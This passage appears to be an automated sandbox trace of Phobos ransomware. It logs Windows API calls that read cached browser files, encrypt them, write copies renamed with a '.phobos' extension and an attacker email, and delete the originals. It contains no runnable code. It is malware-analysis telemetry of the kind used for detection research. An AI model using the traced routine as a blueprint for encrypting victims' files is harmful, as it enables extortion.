pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.915] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.915] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.915] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.915] CloseHandle (hObject=0x194) returned 1 [0188.916] CloseHandle (hObject=0x134) returned 1 [0188.916] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2]")) returned 1 [0188.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.917] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=81727) returned 1 [0188.917] CloseHandle (hObject=0x134) returned 1 [0188.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1")) returned 0x2020 [0188.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.918] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.918] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.919] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.919] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x13f3f, lpOverlapped=0x0) returned 1 [0188.921] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x13f40, dwBufLen=0x13f40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x13f40) returned 1 [0188.922] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x13f40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x13f40, lpOverlapped=0x0) returned 1 [0188.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0188.924] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.924] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.924] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.924] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.924] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.924] CloseHandle (hObject=0x134) returned 1 [0188.924] CloseHandle (hObject=0x194) returned 1 [0188.924] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cb=gapi[1].loaded_1")) returned 1 [0188.926] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.926] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=18233) returned 1 [0188.927] CloseHandle (hObject=0x194) returned 1 [0188.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot")) returned 0x2020 [0188.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.927] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.927] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.934] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.934] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.934] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4739, lpOverlapped=0x0) returned 1 [0188.968] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4740, dwBufLen=0x4740 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4740) returned 1 [0188.968] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4740, lpOverlapped=0x0) returned 1 [0188.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0188.969] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.969] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0188.969] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.969] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x142, lpOverlapped=0x0) returned 1 [0188.969] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.969] CloseHandle (hObject=0x194) returned 1 [0188.970] CloseHandle (hObject=0x134) returned 1 [0188.970] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\cjzkeoubrn4kerxqtauh3fy6323mhuzfjmgtvxag2ie[1].eot")) returned 1 [0188.971] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.972] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=236065) returned 1 [0188.972] CloseHandle (hObject=0x134) returned 1 [0188.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1]")) returned 0x2020 [0188.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.972] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.972] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.973] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.973] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x39a21, lpOverlapped=0x0) returned 1 [0189.234] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x39a30, dwBufLen=0x39a30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x39a30) returned 1 [0189.236] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x39a30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x39a30, lpOverlapped=0x0) returned 1 [0189.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0189.240] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.240] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0189.240] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.240] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0189.240] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.240] CloseHandle (hObject=0x134) returned 1 [0189.240] CloseHandle (hObject=0x194) returned 1 [0189.241] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\f8-028d9f-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\f8-028d9f-f30905ea[1]")) returned 1 [0189.243] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.243] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=35047) returned 1 [0189.243] CloseHandle (hObject=0x194) returned 1 [0189.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot")) returned 0x2020 [0189.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.244] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.244] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.245] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.245] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.245] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x88e7, lpOverlapped=0x0) returned 1 [0189.246] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x88f0, dwBufLen=0x88f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x88f0) returned 1 [0189.246] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x88f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x88f0, lpOverlapped=0x0) returned 1 [0189.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0189.248] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.248] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0189.248] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.248] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0189.248] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.248] CloseHandle (hObject=0x194) returned 1 [0189.249] CloseHandle (hObject=0x134) returned 1 [0189.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\latest[1].eot")) returned 1 [0189.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.250] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4480) returned 1 [0189.250] CloseHandle (hObject=0x134) returned 1 [0189.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1]")) returned 0x2020 [0189.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.251] CreateFileW 